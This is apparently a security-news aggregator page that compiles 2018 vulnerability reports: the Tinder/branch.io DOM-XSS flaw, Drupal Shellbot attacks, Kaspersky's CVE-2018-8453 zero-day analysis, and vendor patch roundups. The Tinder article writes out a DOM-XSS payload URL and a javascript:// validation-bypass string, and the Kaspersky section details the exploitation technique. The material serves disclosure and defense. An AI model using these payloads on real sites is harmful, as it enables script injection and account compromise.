- Vulnerebility -

Last update 09.10.2017 13:51:50

Introduction  List  Kategorie  Subcategory 0  1  2  3  4  5  6  7  8 



DOM-XSS Bug Affecting Tinder, Shopify, Yelp, and More
13.1.0218 securityaffairs 
Vulnerebility

Our team of security researchers was researching dating apps client-side security, and one of the main focus targets was the social search mobile app Tinder.
After initial reconnaissance steps were done, a Tinder domain with multiple client-side security issues was found – meaning hackers could have access to users’ profiles and details.

Immediately after finding these vulnerabilities, we contacted Tinder via their responsible disclosure program and started working with them.

We learned that the vulnerable endpoint isn’t owned by Tinder, but by branch.io, an attribution platform used by many big corporations around the globe. The Tinder security team helped us get in touch with them, and accordingly, they’ve put out a timely patch.

Digging deeper, we found out many big websites were sharing the vulnerable endpoint in their code and domains, including Shopify, Yelp, Western Union, and Imgur. This means that as many as 685 million users could be at risk.

While the flaw has already been fixed, if you have recently used Tinder or any of the other affected sites, we recommend checking to make sure your account hasn’t been compromised. It’s a good idea to change your password ASAP.

Details:
DOM-based XSS vulnerability, also known as “type-0 XSS” is a class of cross-site scripting vulnerability that appears within the DOM. It is a type of attack wherein the attack payload is executed as a result of modifying the DOM environment in the victim’s browser, more so in a dynamic environment. In DOM-based XSS, the HTML source code and response of the attack will be exactly the same. This means the malicious payload cannot be found in the response, making it extremely difficult for browser-built in XSS mitigation features like Chrome’s XSS Auditor to perform.

Can you spot the vulnerabilities?

Tinder

The fact that branch.io wasn’t using CSP made these vulnerabilities easy to exploit in any browser we like.

1. DOM XSS
For example, our initial finding was the endpoint https://go.tinder.com/amp-iframe-redirect was prone to multiple vulnerabilities (scheme_redirect & redirect_strategy GET parameters control the div content).

redirect_strategy is “INJECTIONA” and scheme_redirect is “INJECTIONB” from the code above.

This meant that by modifying redirect_strategy to a dom-xss payload, it was possible to execute client-side code in the context of a Tinder domain in any browser:
https://go.tinder.com/amp-iframe-redirect?scheme_redirect=http://google.com&redirect_strategy=1)%7B%0Aalert(1)%3B//
will render in the DOM as:

if (1){ alert(1);// && “INJECTIONA”) {

var parser = document.createElement(‘a’);

parser.href = “INJECTIONA”;

var protocol = parser.protocol.toLowerCase();

Tinder

2. validateProtocol() and validate() Bypass
Also notice how validateProtocol() uses indexOf to check the schemes – the indexOf() method returns the position of the first occurrence of a specified value in a string. This method returns -1 if the value to search for never occurs. However, it can be tricked by using javascript://%0aalert(0)//good.com/https:// — both the validate functions can be bypassed because indexOf will find “https://“

var parser = document.createElement(‘a’);

parser.href = url;

var protocol = parser.protocol.toLowerCase();

if ((‘javascript:’, ‘vbscript:’, ‘data:’).indexOf(protocol) < 0) {

return url;

}

….

return null;

if ([‘http:’, ‘https:’].indexOf(protocol) < 0) {

window.top.location = validate(“http://google.com”);

}

So, how did this bug affect more than Tinder?
go.tinder.com is an alias for custom.bnc.lt, a Branch.io resource. And many other companies have their alias pointing to it.

To name a few websites affected by this vulnerability: RobinHood, Shopify, Canva, Yelp, Western Union, Letgo, Cuvva, imgur, Lookout, fair.com and more.

Thanks to the fast response we got from Branch’s security team, this vulnerability has now been fixed for everyone’s domains.


Hackers targeting Drupal vulnerabilities to install the Shellbot Backdoor
13.1.0218 securityaffairs 
Vulnerebility  Virus

A group of hackers is targeting Drupal vulnerabilities, including Drupalgeddon2, patched earlier this year to install a backdoor on compromised servers.
Security experts from IBM are targeting Drupal vulnerabilities, including the CVE-2018-7600 and CVE-2018-7602 flaws, aka Drupalgeddon2 and Drupalgeddon3, to install a backdoor on the infected systems and tack full control of the hosted platforms.

According to the IBM experts, this last wave of attacks is conducted by hackers financially motivated and attempt to exploit the lack of patch management in many Drupal websites.

“In a recent investigation, our MSS intelligence analysts discovered that malicious actors are using recent Drupal vulnerabilities to target various websites and possibly the underlying infrastructure that hosts them, leveraging Shellbot to open backdoors.” states the post published by IBM.

“This appears to be a financially motivated effort to mass-compromise websites.”

The expert observed a large number of HTTP POST requests being sent by the same IP address as part of a widespread cyber-attack. The requests were used by the attackers to download a Perl script to launch the Shellbot backdoor that leverages an Internet Relay Chat (IRC) channel as C&C.

Drupal attacks

The bot included multiple tools to carry out distributed denial-of-service (DDoS) attacks and scan for SQL injection weaknesses and other vulnerabilities, including privilege escalation issues.

The bot was designed to automate scanning a large number of websites and fully compromise the vulnerable ones.

Experts pointed out that the Shellbot code first appeared in 2005 and is being used by several threat groups, it was also used in the massive crypto-mining campaign that was exploiting the CVE-2017-5638 Apache Struts vulnerability (CVE-2017-5638) in March 2017.

“It costs a lot of time and money to find or buy a zero-day flaw — two resources cybercriminals are typically not willing to invest. It is much more lucrative to use existing vulnerabilities such as Drupalgeddon and attack code in an automated way, especially when users delay patching and updating their applications,” IBM concludes.


Zero-day exploit (CVE-2018-8453) used in targeted attacks
13.1.0218 Kaspersky
Exploit  Vulnerebility

Yesterday, Microsoft published their security bulletin, which patches CVE-2018-8453, among others. It is a vulnerability in win32k.sys discovered by Kaspersky Lab in August. We reported this vulnerability to Microsoft on August 17, 2018. Microsoft confirmed the vulnerability and designated it CVE-2018-8453.

In August 2018 our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in Microsoft Windows operating system. Further analysis into this case led us to uncover a zero-day vulnerability in win32k.sys. The exploit was executed by the first stage of a malware installer to get necessary privileges for persistence on the victim’s system. The code of the exploit is of high quality and written with the aim of reliably exploiting as many different MS Windows builds as possible, including MS Windows 10 RS4.

So far, we detected a very limited number of attacks using this vulnerability. The victims are located in the Middle East.

Kaspersky Lab products detected this exploit proactively through the following technologies:

Behavioral detection engine and Automatic Exploit Prevention for endpoints
Advanced Sandboxing and Anti Malware engine for Kaspersky Anti Targeted Attack Platform (KATA)
Kaspersky Lab Verdicts for the artifacts in this campaign are:

HEUR:Exploit.Win32.Generic
HEUR:Trojan.Win32.Generic
PDM:Exploit.Win32.Generic
More information about this attack is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com

Technical details
CVE-2018-8453 is a Use-After-Free inside win32kfull!xxxDestroyWindow that resembles an older vulnerability — CVE-2017-0263. CVE-2017-0263 was originally deployed by the Sofacy APT, together with a PostScript exploit, back in 2017.

For technical analysis of the vulnerability, we completely reverse-engineered the ITW exploit sample obtained and rewrote it into a full Proof of Concept.

The exploitation of this vulnerability depends on a sequence of events that are performed from hooks set on three usermode callback functions – fnDWORD, fnNCDESTROY, and fnINLPCREATESTRUCT. The exploit installs these hooks by replacing the function pointers in the KernelCallbackTable:

Hooked functions in the Kernel Callback Table

Inside the fnINLPCREATESTRUCT hook, the exploit initializes a “SysShadow” window by explicitly assigning a position to it:

Usermode hook on fnINLPCREATESTRUCT initializes SysShadow

When processing the WM_LBUTTONDOWN message, the fnDWORD hook executes the DestroyWindow function on the parent, which results in the window being marked as free and subsequently freed by the garbage collector.

The issue lies inside the fnNCDESTROY hook that is performed during execution of the DestroyWindow function. This hook executes the NtUserSetWindowFNID syscall, which contains a flawed logic to change the fnid status of the window without properly checking if it is set to FNID_FREED.

Vulnerable code inside NtUserSetWindowFNID

The fnid status of the window is located at offset 0x02a in the tagWND structure:

kd> dt win32k!tagWND

+0x02a fnid : Uint2B

When the scrollbar is initially created, it has the value FNID_SCROLLBAR (0x029A).

The next diagram shows the value of fnid prior and after execution of the NtUserSetWindowFNID syscall:

Scrollbar fnid prior and after execution of NtUserSetWindowFNID syscall

We can check what the new fnid value is by verifying it against the ReactOS source code:

/* FNIDs for NtUserSetWindowFNID, NtUserMessageCall */
#define FNID_SCROLLBAR 0x029A

#define FNID_BUTTON 0x02A1

#define FNID_FREED 0x8000 /* Window being Freed… */

This action results in the first scrollbar being destroyed, while the system still maintains a reference to a “SysShadow” class, as the scrollbar fnid is no longer marked as FNID_FREED, but as FNID_BUTTON instead.

To successfully reclaim the freed memory pool, the exploit contains a number of different feng shui tactics. The spray procedure is dependent on the exploited Windows version, and because the exploit targets a wide range of operating systems, it includes five separate functions for spraying:

Heap spraying procedures supported in the exploit

For the latest supported version (Windows 10 RS4), the spray tactic is quite complicated. The kernel is sprayed with bitmap objects of different size. This is required to exhaust the memory allocator to eventually bypass the Low Fragmentation Heap security mitigations that were significantly improved in the latest Windows builds:

Heap Feng Shui technique for Windows RS4 17134

This leads to the following memory layout, where USERTAG_SCROLLTRACK is the freed pool allocation:

Freed scrollbar heap allocation

When another scrollbar is allocated, the SysShadow class memory reference is reused, but its contents are attacker-controlled, because the freed Usst (ffffee30044b2a10) and Gpbm (ffffee30044b2a90) pools were merged into a single block:

Freed allocation is merged with the following pool

This results in a powerful arbitrary kernel Read\Write using GDI Bitmap primitives that works even on the latest Windows versions.

Following successful exploitation, a slightly modified Token-stealing payload is used to swap the current process Token value with the one from the SYSTEM EPROCESS structure:

Modified Token-stealing payload process

So far, we’ve observed the usage of this exploit in a small number of targeted attacks, when the exploit is packaged in a malware installer. The installer requires system privileges to install its payload. The payload is a sophisticated implant, used by the attackers for persistent access to the victims’ machines. Some of its main characteristics include:

Encrypting the main payload using AES-256-CBC with the SHA-1 of the SMBIOS UUID (this makes it impossible to decrypt the payload on machines other than the victim, if the SMBIOS UUID is not known)
Using Microsoft BITS (Background Intelligent Transfer Service) for communicating with its C&C servers, an unusual technique
Storing the main payload in a randomly named file on disk; the loader contains a hash of the filename and attempts to find the payload by comparing the filename hash for all files in the Windows directory
More details on this malware and the APT behind it are available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com

Victims
The distribution of the attack seems to be highly targeted, affecting less than a dozen victims in the Middle East region, according to our telemetry.

Attribution
During our investigation, we discovered the attackers were using a PowerShell backdoor that has previously been seen exclusively used by the FruityArmor APT. There is also an overlap in the domains used for C2 between this new set of activity and previous FruityArmor campaigns. That makes us assess with medium confidence that FruityArmor is responsible for the attacks leveraging CVE-2018-8453.

Conclusion
Even when deploying 0-days seems to be more frequent than it used to be, this would be the second time we have spotted FruityArmor using one of them to distribute its malware. This points to the resources and sophistication of this actor, along with the advanced final-stager they distribute.

So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved.

We believe that although FruityArmor´s activity has been slowly increasing during the last two years, the extremely targeted nature of the attacks helps them fly below the radar.

Appendix I – Indicators of compromise:
Domains:
weekendstrips[.]net
shelves-design[.]com


Juniper Patches Serious Flaws in Junos OS
12.10.2018 securityweek
Vulnerebility

Juniper Networks this week informed customers that its Junos operating system is affected by many serious vulnerabilities, including a flaw that may have been triggered during malicious network probing.

Juniper on Wednesday published nearly two dozen advisories describing security holes in Junos, the operating system that powers its networking and security products. The company has provided patches and mitigations for each of the vulnerabilities.

One of the more interesting issues is CVE-2018-0049, which allows an attacker to crash the Junos kernel by sending specially crafted MPLS packets. Juniper noted that a single packet can cause a denial-of-service (DoS) condition, but an attacker can launch a sustained DoS attack by continually sending malicious packets.

Juniper says that while it's not aware of instances where this vulnerability was specifically targeted by hackers, the company is aware of "possible malicious network probing which may have triggered this issue."

Juniper has assigned a "critical" risk level to several vulnerabilities affecting the NTP daemon. The Network Time Foundation recently patched several vulnerabilities, including ones rated "critical" and "high severity," and Juniper has now rolled out the fixes to its customers with Junos OS updates.

Juniper NFX series devices are affected by a critical flaw that can allow a remote attacker to gain access to the system through accounts with blank passwords. The company addressed the issue by not allowing empty passwords.

The list of Junos vulnerabilities that are close to critical – with a CVSS score of 8.8 – includes two vulnerabilities that can be exploited to crash the routing protocol daemon (RPD) and possibly for remote code execution.

Juniper has also disclosed the existence of several other severe RPD-related vulnerabilities that can be exploited to cause a DoS condition.

An update for the Junos Space Network Management Platform fixes several vulnerabilities, including ones considered "high risk."

Another serious DoS vulnerability has been found in the SIP application layer gateway (ALG) in Junos, which allows an attacker to crash various processes.

A "high risk" rating has also been assigned to a vulnerability in the RSH service that allows a remote and unauthenticated attacker to gain root access to affected devices.

A dozen of the advisories published this week by Juniper describe "medium risk" flaws that can be exploited for DoS and cross-site scripting (XSS) attacks.


Audit Finds No Critical Flaws in Firefox Update System
12.10.2018 securityweek
Vulnerebility

An audit commissioned by Mozilla for the Firefox update system revealed no critical vulnerabilities and the flaws rated "high severity" were not easy to exploit.

Experts at Germany-based X41 spent 27 days analyzing the Firefox Application Update Service (AUS), including its update signing protocol, client code, backend and other components. The audit involved a cryptographic review, fuzzing, pentesting, and manual code analysis.

X41's audit revealed 14 vulnerabilities, including three issues that based on their CVSS score would be rated as "high severity," seven "medium" and four "low" flaws. In addition, experts discovered 21 issues that have been described by Mozilla as "side findings," which are informational.

The most serious of the security holes are related to the use of JavaScript libraries with known vulnerabilities, the lack of validation for cross-site request forgery (CSRF) tokens, and the use of cookies without the "secure" flag. All of these problems affected the backend service that manages updates, which Mozilla has dubbed Balrog.

While these flaws may have normally posed a serious risk, Mozilla pointed out that the actual risk was lowered due to AUS being protected by multiple layers of authentication inside its internal network.

The audit also uncovered some bugs in the code that handles update files, but the cryptographic signatures implemented by Mozilla prevent threat actors from creating malicious update files.

Researchers also discovered some less serious denial-of-service (DoS) bugs, memory corruption issues, and insecure handling of data, but they noted that exploitation was prevented by the need to bypass crypto signatures.

"No issues were identified in the handling of cryptographic signatures for update files," X41 wrote in its report. "There were no cryptographic signatures on the XML files describing the update files’ location and other metadata. The files were downloaded via HTTPS, but the server certificates or public keys were not pinned."

Auditors noted that the number of informational bugs was "unusually high" and warned that these should be patched as well, as some of them could turn out to be exploitable and critical.

"In conclusion, the AUS showed good resistance against the actual exploitation of vulnerabilities," X41 said.

Mozilla has already patched the serious vulnerabilities and is currently working on addressing the less severe issues and the side findings. The organization has made public the full report from X41 and opened the bug tracker where the patching progress can be monitored.

This is not the first security audit commissioned by Mozilla. Last year it hired Cure53 to analyze the Firefox Accounts system.


Juniper Networks provides dozens of fix for vulnerabilities in Junos OS

12.10.2018 securityaffairs Vulnerebility

Juniper Networks has released security updates to address serious vulnerabilities affecting the Junos operating system.
This week, Juniper Networks has patched dozens of serious security provided security patches for each of them, the security advisories are available on the company website.

The most severe flaw is probably the CVE-2018-0049, which could be exploited by an attacker to crash the Junos kernel by sending specially crafted MPLS packets.

Juniper reported that a single specially crafted MPLS packet could trigger a DoS condition while sending more packets it is possible to crash the device.

“A NULL Pointer Dereference vulnerability in Juniper Networks Junos OS allows an attacker to cause the Junos OS kernel to crash. A single packet received by the target victim will cause a Denial of Service condition. Continued receipt of this specifically crafted malicious MPLS packet will cause a sustained Denial of Service condition.” reads the security advisory.

As a possible workaround, the company suggests to Remove MPLS configuration stanza from interfaces at risk.

At the time of the provisioning of the patch, there is no news about exploitation of the flaw in the wild, anyway, Juniper is aware of “possible malicious network probing which may have triggered this issue.

Another severe flaw fixed by Juniper affecting the Juniper NFX series devices could be exploited by a remote attacker to gain access to the system by using accounts with blank passwords.

The patched provided by the company no more allow empty passwords.

Juniper also provided fixes for several vulnerabilities affecting the NTP daemon. The company addressed several flaws in RDP most of them could be exploited to cause a DoS condition.


Two issues can be exploited to crash the routing protocol daemon (RPD) and potentially allow remote code execution.

Giving a look at the list of advisories we can find a fix a high-risk vulnerability in Junos Space Network Management Platform and a DoS flaw in the SIP application layer gateway (ALG) in Junos. This latter issue could be exploited by an attacker to crash several processes.

Experts also fixed a high-risk flaw in the RSH service that could allow a remote and unauthenticated attacker to gain root access to affected devices.

The company also fixed dozen of DoS and XSS flaws rated as “medium risk.”


SAP October 2018 set of patches fixes first Hot News security note for SAP BusinessObjects in 5 years
11.10.2018 securityaffairs
Vulnerebility

SAP released its October 2018 set of patches, it includes the first Hot News security note for SAP BusinessObjects in over five years.
SAP released its October 2018 set of patches that included 11 security notes, the company also released 4 updates to previously released notes.

The patches include 15 notes, 2 rated Hot News and one of which is the first note for SAP BusinessObjects in over five years.

“SAP BusinessObjects BI Suite has an Information Disclosure vulnerability (CVSS Base Score: 9.8 CVE-2018-2471). An attacker can use it to reveal additional information (system data, debugging information, etc.) that will help to learn about a system and plan other attacks.” reads a blog post published by ERPScan.

The remaining notes include 4 High priority and 9 Medium priority, in October Information Disclosure is the largest group in terms of the number of vulnerabilities.

businessObjects sap-notes-october-2018-types-1

The most important note (CVSS score of 9.8) addresses an information disclosure issue in the SAP BusinessObjects Business Intelligence Suite client tracked as CVE-2018-2471.

“Under certain conditions SAP BusinessObjects Business Intelligence Platform 4.10 and 4.20 allows an attacker to access information which would otherwise be restricted.” reads the security advisory.

The second Hot News in the October 2018 set of patches is an update to Security Note released on April 2018, it provides security updates for the Chromium browser delivered with SAP Business Client.

The High priority flaws addressed by SAP in October are:

2699726 [CVE-2018-2475] Missing network isolation in Gardener
Product – project “Gardener”; Versions – 0.12.2 High 8.5
2674215 Denial of service (DOS) in OPC UA applications of SAP Plant Connectivity
Related CVEs – CVE-2018-12585, CVE-2018-12086
Product – SAP Plant Connectivity; Versions – 15.0, 15.1, 15.2 High 8.2
2392860 Update to Security Note released on February 2017 Patch Day:
Leveraging privileges by customer transaction code
Product – SAP Records Management; Versions – 7.0 to 7.02, 7.10, 7.11, 7.30, 7.31, 7.40, 7.50, 7.51 High 8.0
2681207 Update to Security Note released on September 2018 Patch Day:
[CVE-2018-2465] Missing XML Validation vulnerability in SAP HANA, Extended Application Services classic model
Product – SAP HANA; Versions – 1.0, 2.0 High 7.5
Experts from security firm ERPScan noticed that chaining the missing network isolation in Gardener theoretically can lead to compromise of clusters in the application context

The others SAP security notes address vulnerabilities in in Netweaver Application Server for ABAP (CVE-2018-2470), BusinessObjects (CVE-2018-2472, CVE-2018-2467), Data Services (CVE-2018-2466), Plant Connectivity (CVE-2017-12069), Adaptive Server Enterprise (CVE-2018-2469, CVE-2018-2468), and Fiori (CVE-2018-2474).

This patch update also addresses 5 Support Package Notes.


Windows Zero-Day Exploited in Attacks Aimed at Middle East
11.10.2018 securityweek
Vulnerebility

One of the vulnerabilities patched by Microsoft with its latest Patch Tuesday updates is a Windows zero-day exploited by an advanced persistent threat (APT) group in attacks aimed at entities in the Middle East.

The flaw, tracked as CVE-2018-8453, has been described by Microsoft as a privilege escalation issue related to how the Win32k component of Windows handles objects in memory. An authenticated attacker can exploit the vulnerability to take control of an affected system.

The vulnerability was reported to Microsoft by Kaspersky Lab after one of the security firm's systems detected an exploitation attempt. Kaspersky said it had reported the vulnerability to Microsoft on August 17 – it's unclear why Microsoft waited so long to release a fix.

According to Kaspersky, CVE-2018-8453 has been exploited by an APT group it tracks as FruityArmor. The exploit was executed by a malware installer for obtaining the privileges needed to gain persistence on the targeted system.

The security firm said FruityArmor created a high quality and reliable exploit that would work on as many versions of Windows as possible, including Windows 10.

Kaspersky has described the vulnerability as a use-after-free bug that is similar to CVE-2017-0263, a flaw patched by Microsoft back in May 2017 after it had been exploited by the Russia-linked threat actor known as APT28, Sofacy and Fancy Bear.

Hackers packaged the CVE-2018-8453 exploit in a malware installer that requires system privileges to deploy its payload. The payload has been described as a "sophisticated implant used by the attackers for persistent access to the victims' machines."

Kaspersky has seen the exploit being used against less than a dozen targets located in the Middle East.

"So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved," Kaspersky researchers explained.

The company determined that FruityArmor is likely behind these attacks after discovering a PowerShell backdoor that in the past was only used by this APT group. In addition, some of the command and control (C&C) domains used in the latest campaign were also involved in past FruityArmor operations.

A blog post published early on Wednesday by Kaspersky contains technical details on the vulnerability and how it has been exploited by FruityArmor.

This is not the first time Kaspersky has come across a zero-day vulnerability exploited by FruityArmor. The hackers also exploited a Windows zero-day back in 2016, which Microsoft patched in October 2016 after being alerted by Kaspersky. At the time, the victims were researchers, activists and government-related individuals in Thailand, Iran, Algeria, Yemen, Saudi Arabia and Sweden.

"We believe that although FruityArmor´s activity has been slowly increasing during the last two years, the extremely targeted nature of the attacks helps them fly below the radar," Kaspersky said.


Many Siemens Products Affected by Foreshadow Vulnerabilities
11.10.2018 securityweek
Vulnerebility

Siemens informed customers this week that many of its products are affected by the recently disclosed processor vulnerabilities known as Foreshadow and L1 Terminal Fault (L1TF).

There are a total of three Foreshadow vulnerabilities affecting Intel Core and Xeon CPUs: CVE-2018-3615, which impacts Intel’s Software Guard Extensions (SGX); CVE-2018-3620, which impacts operating systems and System Management Mode (SMM); and CVE-2018-3646, which affects virtualization software and Virtual Machine Monitors (VMM).Foreshadow/ L1TF vulnerabilities affect Siemens products

The security holes could allow malicious applications to obtain potentially sensitive information from a device's memory, including data associated with operating systems, apps and virtual machines.

Siemens noted that several of its industrial products use the impacted Intel processors, including RUGGEDCOM, SIMATIC, SIMOTION and SINUMERIK devices. The Siemens advisory lists more than 30 affected products.

The company has released BIOS updates, workarounds and mitigations to help users prevent potential attacks exploiting the Foreshadow vulnerabilities. The German industrial giant has also advised customers to install available operating system updates.

BIOS updates are currently available for SIMATIC IPC, SIMATIC Field PG, SIMATIC ITP, SIMOTION P and SINUMERIK PCU devices, and the company is working on releasing firmware patches for other products as well.

Since Foreshadow requires the attacker to execute a malicious application on the targeted system, Siemens recommends "limiting the possibilities to run untrusted code if possible," including by applying defense-in-depth methods.

Several organizations have released advisories for the Foreshadow vulnerabilities, including Cisco, F5 Networks, HPE, Synology, Huawei, Lenovo, SonicWall, NetApp, and CERT/CC. While NIST and some of the vendors have classified the flaws as "medium severity," Siemens, Huawei, Lenovo, SonicWall, NetApp, and HPE have assigned CVSS scores that put them in the "high severity" category.


SAP Patches Critical Vulnerability in BusinessObjects
11.10.2018 securityweek
Vulnerebility

This week, SAP released its October 2018 set of patches, which includes the first Hot News security note for SAP BusinessObjects in over five years.

SAP included 11 security notes in its October 2018 Security Patch Day, to which it also added 4 updates to previously released notes. Thus, the patches include 15 notes: 2 rated Hot News, 4 High priority, and 9 Medium priority.

Featuring a CVSS score of 9.8, the most important of the notes addresses an information disclosure issue in the SAP BusinessObjects Business Intelligence Suite client (CVE-2018-2471).

An analytics business intelligence front-end platform, BusinessObjects provides customers with the ability to search and analyze data, and with the option to visualize it and perform predictive analytics.

The information disclosure bug can be triggered through the execution of certain special Central Management Server (CMS) scripts on the Central Management Server. The execution is performed without properly checked authorizations, as ERP and business-critical application security company Onapsis explains.

Additionally, SAP tagged as Hot News an update to a note released in April 2018, which provides security updates for the Chromium browser delivered with SAP Business Client.

The High priority flaws include missing network isolation in Gardener (CVE-2018-2475), denial of service (DOS) in OPC UA applications of SAP Plant Connectivity (CVE-2018-12585, CVE-2018-12086), and updates to previously released notes, affecting SAP Records Management and SAP HANA.

The missing network isolation flaw in Gardener can be combined with other security issues to theoretically lead to the compromise of clusters in the application context, ERPScan, a company that specializes in securing Oracle and SAP products, reveals.

The remaining SAP security notes address bugs in Netweaver Application Server for ABAP (CVE-2018-2470), BusinessObjects (CVE-2018-2472, CVE-2018-2467), Data Services (CVE-2018-2466), Plant Connectivity (CVE-2017-12069), Adaptive Server Enterprise (CVE-2018-2469, CVE-2018-2468), and Fiori (CVE-2018-2474).

Five support package notes are added to the 15 Security Patch Day notes, for a total of 20 security notes. Six of the notes are updates to previously released security notes.

Information disclosure was the most encountered type of vulnerability, followed by cross-site scripting (XSS), XML external entity (XXE), and cross-site request forgery (CSRF).


CVE-2018-8453 Zero-Day flaw exploited by FruityArmor APT in attacks aimed at Middle East
10.10.2018 securityaffairs
APT  Vulnerebility

A Windows zero-day flaw addressed by Microsoft with its latest Patch Tuesday updates is exploited by an APT group in attacks aimed at entities in the Middle East.
The Windows zero-day vulnerability tracked as CVE-2018-8453 is a privilege escalation flaw that was exploited by an APT group in attacks against entities in the Middle East.

The flaw, tracked as CVE-2018-8453, affects the Win32k component of Windows handles objects in memory.

The flaw was discovered by experts from Kaspersky Lab could be exploited by an authenticated attacker to take control of an affected system.

CVE-2018-8453 Win 0day

Kaspersky Lab reported the vulnerability to Microsoft on August 17, roughly two months ago.

Kaspersky revealed that the CVE-2018-8453 vulnerability has been exploited by the APT group tracked as FruityArmor, a cyber-espionage group that was first observed in 2016 while targeting activists, researchers, and individuals related to government organizations.

Experts believe FruityArmor´s activity has been slowly increasing during the last two years.

The zero-day exploit was included by malware installer used by the group to escalate privileges on the target machine and to gain persistence.

The final payload dropped by the malware was a sophisticated implant used by the attackers for persistent access to the victims’ machines.”

“In August 2018 our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in Microsoft Windows operating system. Further analysis into this case led us to uncover a zero-day vulnerability in win32k.sys.” reads the report published by Kaspersky.

“The exploit was executed by the first stage of a malware installer to get necessary privileges for persistence on the victim’s system. The code of the exploit is of high quality and written with the aim of reliably exploiting as many different MS Windows builds as possible, including MS Windows 10 RS4.”

The zero-day resembles an older vulnerability tracked as CVE-2017-0263 that was fixed by Microsoft in May 2017 and that it had been exploited by the Russia-linked cyberespionage group tracked as APT28.

The zero-day exploit was used in targeted attacks against less than a dozen entities located in the Middle East.

“So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved.” continues the report.

The attribution was possible due to the detection of a PowerShell backdoor that has previously been exclusively used by the FruityArmor APT. Experts also confirmed an overlap in the C2 infrastructure between the last campaign and previous attacks attributed to the group.

Further technical details are reported by Kaspersky experts in their analysis.


Microsoft Patches Windows Zero-Day Exploited by 'FruityArmor' Group
10.10.2018 securityweek
Vulnerebility

Microsoft's Patch Tuesday updates for October 2018 resolve nearly 50 vulnerabilities, including a Windows zero-day flaw exploited by an advanced persistent threat (APT) actor known as FruityArmor.

The zero-day, tracked as CVE-2018-8453, has been described by Microsoft as a privilege escalation issue related to how the Win32k component of Windows handles objects in memory. The company says an authenticated attacker can exploit the security hole to elevate privileges and take control of the affected system.

According to Microsoft, the vulnerability has been actively exploited against older versions of Windows, but exploitation may also be possible on the latest versions of the operating system.

The flaw was reported to Microsoft by Kaspersky Lab, whose experts noticed the attacks exploiting CVE-2018-8453. Kaspersky will publish a detailed technical report on Wednesday, but the company told SecurityWeek that the vulnerability has been exploited by the FruityArmor group in a highly targeted campaign.

Interestingly, Microsoft's Patch Tuesday updates for October 2016 also addressed a Windows zero-day exploited by FruityArmor. That attack was also first observed by Kaspersky Lab.

Microsoft's latest updates also fix three vulnerabilities that were publicly disclosed before patches were made available, including a JET Database Engine issue for which an unofficial patch was released by 0patch.

The other disclosed flaws are a privilege escalation bug affecting the Windows kernel, and a remote code execution weakness impacting Azure IoT.

A dozen of the vulnerabilities addressed this month are critical. They impact Internet Explorer, Edge, Hyper-V, and XML Core Services.

One of the patches addresses CVE-2010-2190. This vulnerability was first resolved in 2010, but Exchange Server was not identified as one of the affected products at the time.

"This vulnerability affects all installations of Exchange Server. If you are running any version of Exchange server released prior to Exchange Server 2016 Cumulative Update 11 (as of this publishing, Cumulative Update 10 is the most recent cumulative update for Exchange 2016), the Visual Studio 2010 updates in MS11-025 should be applied to your Exchange Server," Microsoft explained in its advisory.

The remaining vulnerabilities have been classified as "important" – and a couple as "moderate" and "low" – and they impact Windows, SharePoint, Office, Edge, and SQL Server Management Studio.

"There was a total of 49 CVEs addressed across the portfolio," commented Chris Goettl, director of product management and security for Ivanti. "As expected, the majority, 33 were fixed in Windows 10, Edge, and the associated Server versions. Also, please note that there was an update for Server 2019 which was made generally available last week. Microsoft continued the trend from last month where they introduced both a monthly rollup and a security-only release for Server 2008. Prior to that there was only a single security update. Updates were released for all supported versions of Exchange Server and Sharepoint Server this month as well."


No Security Fixes in Patch Tuesday Updates for Flash Player
10.10.2018 securityweek
Vulnerebility

The Patch Tuesday updates released this month by Adobe for Flash Player include no security fixes. The company did address several vulnerabilities in some of its other products.

Adobe informed customers that Digital Editions for Windows, Mac and iOS is impacted by nine vulnerabilities, including four critical memory-related bugs that can be exploited for arbitrary code execution. The remaining flaws have been rated "important" and they can result in information disclosure.

All the Digital Editions flaws were reported to Adobe by Jaanus Kääp of Clarified Security.

Kushal Arvind Shah of Fortinet’s Fortiguard Labs informed Adobe of DLL hijacking vulnerabilities that allow privilege escalation in the Technical Communications Suite and the Framemaker application. Both security holes have been rated "important."

In Experience Manager, Adobe patched several stored and reflected cross-site scripting (XSS) vulnerabilities that can result in the disclosure of sensitive information.

While no security fixes have been rolled out on Tuesday for Flash Player, that does not mean the application is 100% secure. In October 2017, Adobe released no Patch Tuesday updates, but one week later it issued an emergency fix for Flash Player to resolve a zero-day vulnerability that had been exploited in targeted attacks by a Middle Eastern threat actor.

The number of vulnerabilities found by researchers in Flash Player has decreased significantly after Adobe announced its intention to kill the application by 2020, but malicious actors are still looking for flaws they can exploit in their operations. A zero-day was exploited by hackers as recently as June.


WECON PI Studio HMI software affected by code execution flaws
9.10.2018 securityaffairs
ICS  Vulnerebility

Security experts discovered several vulnerabilities in WECON’s PI Studio HMI software, the company has verified the issues but has not yet released patches.
Researchers Mat Powell and Natnael Samson discovered several vulnerabilities in WECON’s PI Studio HMI software, a software widely used in critical manufacturing, energy, metallurgy, chemical, and water and wastewater sectors.

Both experts have reported the flaw under the Trend Micro’s Zero Day Initiative,

WECON specializes in human-machine interfaces (HMIs), programmable logic controllers (PLCs), and industrial PCs. The company’s products are used all around the world, particularly in the critical manufacturing, energy, and water and wastewater sectors.

The list of flaws discovered by the experts includes a critical stack-based buffer overflow vulnerability, tracked as CVE-2018-14818, that could lead to remote code execution.

Another flaw tracked as CVE-2018-14810 is a high severity out-of-bounds write bug which may allow code to be executed in the context of an administrator,

The remaining issues are two medium severity information disclosure flaws tracked as CVE-2018-17889 and CVE-2018-14814.

“Successful exploitation of these vulnerabilities may allow remote code execution, execution of code in the context of an administrator, read past the end of an allocated object or allow an attacker to disclose sensitive information under the context of administrator.” reads the security advisory published by the ICS-CERT.

WECON has confirmed the vulnerabilities, but it has not revealed when it will release security patches.

WECON PI Studio 2

Below the list of mitigation provided by the ICS-CERT:

“WECON has verified the vulnerabilities but has not yet released an updated version.” continues the security advisory.

